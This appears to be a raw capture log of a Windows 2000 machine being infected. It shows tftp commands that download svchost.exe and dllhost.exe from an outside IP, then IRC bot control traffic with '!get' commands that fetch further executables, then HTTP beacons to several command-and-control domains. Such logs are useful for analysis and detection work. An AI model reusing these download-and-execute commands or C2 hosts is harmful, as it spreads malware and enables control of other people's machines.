Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 222.237.152.64 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 222.237.152.64 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	\000\004\000; 
VICTIM:  	\000\004\000< 
VICTIM:  	\000\004\000= 
VICTIM:  	\000\004\000> 
VICTIM:  	\000\004\000? 
VICTIM:  	\000\004\000@ 
VICTIM:  	\000\004\000A 
VICTIM:  	\000\004\000B 
VICTIM:  	\000\004\000C 
VICTIM:  	\000\004\000D 
VICTIM:  	\000\004\000E 
VICTIM:  	Transfer successful: 35088 bytes in 29 seconds, 1209 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	tftp -i 222.237.152.64 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	Transfer successful: 25600 bytes in 21 seconds, 1219 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK siracuyfUSER e020500 . . :_ 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG siracuyf :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe:u. PRIVMSG siracuyf :!get http:/wertlist.com/ml2.txt 
VICTIM:  	GET /p/out/kp.exe HTTP/1.0User-Agent: DownloadHost: shabi.coolnuff.com:2012Pragma: no-cache 
ATTACKER:	GET /ml2.txt HTTP/1.0User-Agent: DownloadHost: wertlist.comPragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869CEDCE5CA9D5FE6F6CADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=9.929836E-03 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /myck.jpg?t=7.169741E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: ru.coolnuff.com:2011Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=B2AC7094DA4A993D937E752F12685E9D46DD9EA8153420E7DAE38AF89148290E88C163879DA082DF452E1B72F0FC59B69354F51F51CFA6F49CAC48E24E390E6581D27F0B31FE0897F0CA651F30DE3EE1F4039FA2E49A363012B07A17FC0531B591C9E8C8331E54E419AAC4437F7F059F80775E718CCB98BFE0B9335C68DE2B95EDE9FC5580AECE0A85B2EBBBCB0AE764&t=0.8511011 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=3927D83CDE4E4FEBDF3238620278589BA53E80B69EBF66A1182196E4528BAA8D71385EBAC1FC461B19722D443B37628D6CAB816B99077C2EBD8DEF45691EFF949BC85C284C8318875369700A9B75C51AB6414875512F2E281DBF6B0625DC39BDA9F10020F6DB59E9D0633EA86C95A62E15E0237DDD8E33011602691C6DCF9C66CCDCB6137A57DE1F0F39124637F36C1158B9&t=0.8578302 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-FA-9F-DF&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88 
ATTACKER:	GET /ck3.jpg?t=0.7537042 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: ru.coolnuff.com:2011Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=9C82B357108002D03FD7C2EF3840C537864F7E4990C2599535566C2E19C20B2D770DD73A7E1229197648167B4A70638A2AED11F759C677246E4102A48CF00E7F59257901C110E07FCBF1A3D903ED1FC046B1CBF6FD83131500A2214CB54C0185366EBB9B775A52E2C271D95E0E0EF16BF0076D423A7DF5D28ED7DBB45FE9803E424BFD5B7B4BE72F201A6A3B5A991392&t=0.201214 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=D8C67397A131489A30D890BD1F679260478EB384B8EAF834BFDC88CABF6492B4265CF61BCDA1A595794797FA6258BD54E6216B8DCF50FDAED6F9CD6B532FB4C52B57A6DE845530AFC6FCE09AF01ED7084DBA1E23057B73752B89AAC72ED7CE4AD880AE8E3F127FCF5AE9A83E13EA038B0CF91846732010229E8A7B0E3A9825DF5D4D7DDBB78266A0B4876B395396A7DAF328&t=0.2275812 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-FA-9F-DF&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck3.nucleardiscover.com:88 
ATTACKER:	GET /ck4.jpg?t=0.692547 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: ru.coolnuff.com:2011Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=E4FA12F666F642E6DA317C2789F2FA0E8D410F670B45FE642246ADD85C84CEE0A9E1759129473506506E305C2D13CD21D610EC504AD5C5ED4372E640D8A0E28CD7A9AED23CEFC45B407A85FFBD536BB40FF80A3794EAF9FF6DCF167B42BBBA3E0A52E4C4270A61D157E475F24F4F950FF502321D8FC8AC8B6D34D3BCD167B60821278128AC83BD7D82B4376538F04B37&t=6.850833E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=2C32AF4B42D266C2D43FABF0B2C92ADE8C40BDD50F41940E096D542161B99EB02D655BBF335DB48788B6B0DC3B05C42820E6D8643DA295BD6D5CF1572C545937A8D6E8949241851A457FEC9633DDE03FBE49221FED93DADC93319AF7E31A20A48FD781A1DAF76DDD4CFF990FE31AA32BF90CE7B93B681A285B4FABDE6FCD38C212029539C4EA428A1E2A3667D51D710CA242&t=0.6691095 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869CEDCE5CA9D5FE6F6CADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.6294367 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: mewgost.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-FA-9F-DF&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88Cookie: ASPSESSIONIDAQCDTQBR=GADJNHACACNMGAHBBGDNLPAP 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /gggg_r.jpg?t=0.4508631 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 61.147.123.53:1056Connection: Keep-AlivePragma: no-cache 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu